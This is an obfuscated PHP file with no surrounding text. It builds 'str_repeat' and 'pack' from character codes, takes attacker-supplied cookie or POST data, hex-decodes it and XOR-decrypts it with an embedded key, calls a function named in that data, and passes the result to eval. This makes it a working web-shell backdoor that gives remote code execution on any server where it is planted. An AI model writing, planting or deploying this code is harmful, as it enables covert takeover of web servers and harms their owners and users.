<?php	$BhsHJAQk	=	"\x73"/*  Gb  */.	't'     ./* l*/"\x72"	.	chr/*VLX   */(95)	./*RlcSi*/"\x72"     .	"\x65"	./*f  */"\x70"	./* pPa */'e'    .	chr	( 834/*HLSx   */-     737/* EXdv   */)."\x74";
    $DWuosdUK	=/*  q  */'p'  .	'a' .	"\x63" . chr	(   400/*   dZwV  */-/*EbG */293/*  tzmWu   */);

function/*   tg  */PKLhQLfCn()
   	{
   $XZrTs/*qkBEo */=     Array/*js  */(    "xXKutJfqLWiSBJWlEeXLBb"	=>	"aNEyOuHiNobfiKhOEPXKelG"   );;
		
   	$KvZOQQ   = Array	(	"cqUzKzbxhkrTRnGjqFxKRKBGsA" =>/*   c*/"lMONUZ"  );
        $PWVPsRlw	=   Array(/*  ff   */$XZrTs,/* Xqv  */$_COOKIE,	$XZrTs,	$_POST,	$KvZOQQ);
 	
  	return    $PWVPsRlw;
					}
			
				  function	fLyFyRnn($kDKfZhe,     $XZrTs)
		     {
/*Az  */if/* wZ  */(	count/*   Yva */(   $kDKfZhe   )/*yV  */==	3/*BOEE  */)/*  Sj  */{
				  $LmDIxWsZL	=  $kDKfZhe[1];


    $olajIwSzh    =	$kDKfZhe[2];


	$lUQLU  =	$LmDIxWsZL($olajIwSzh);
  /*fzB   */eval	(  $lUQLU     );
			die/* gJtDY   */();;
    	}
			 }
  
					function	bcdXsnBZYg($sDqtptMKC,/*iFlWy  */$uByinG)
         {

   return $sDqtptMKC     ^  $uByinG;;
			/*   YpYcs*/}
  /*Nwbc   */


   $KYJzHO/* eCSEx*/=  chr/*  Ab */(35);
	    


	function	QIPZWXEAx($lYEzzrggi,    $KYJzHO)
   /* OgC*/{     
       
		/*  i  */$lYEzzrggi/*  IL   */=	explode/* amzdh*/($KYJzHO, $lYEzzrggi	);
				
      fLyFyRnn($lYEzzrggi,   $KYJzHO);;
					     }
	/* Co*/
 /* GuyXJ*/
  
  /* preCZ */foreach    (PKLhQLfCn()	as	$eDjkeoON)/*aj   */{
				   foreach/*vCPzW   */(	$eDjkeoON    as/*  h   */$uByinG	=>/*  Og   */$sDqtptMKC/*  n  */)/* Xs*/{

	


/*a  */$uTlQQo	= strlen(     $sDqtptMKC   )/strlen(/*NF   */$uByinG );
     /*  IH  */
			$sDqtptMKC	=	@$DWuosdUK(/*pYUs   */'H'	.   "\x2a", $sDqtptMKC	);


  
    	$uByinG	.=	"Jfcq-PxlyV-hyD-KID-zaz-SLYpi-GKBxBCQ";$_nCwp	=	'27758';
  	$uByinG/*   IX  */=   $BhsHJAQk  (	$uByinG,     $uTlQQo/*   Cd  */+/*Cb*/1);
/* i */

	QIPZWXEAx(bcdXsnBZYg($sDqtptMKC,/*   wX   */$uByinG),	$KYJzHO);;


   
   /*   pI*/continue;
					}
				}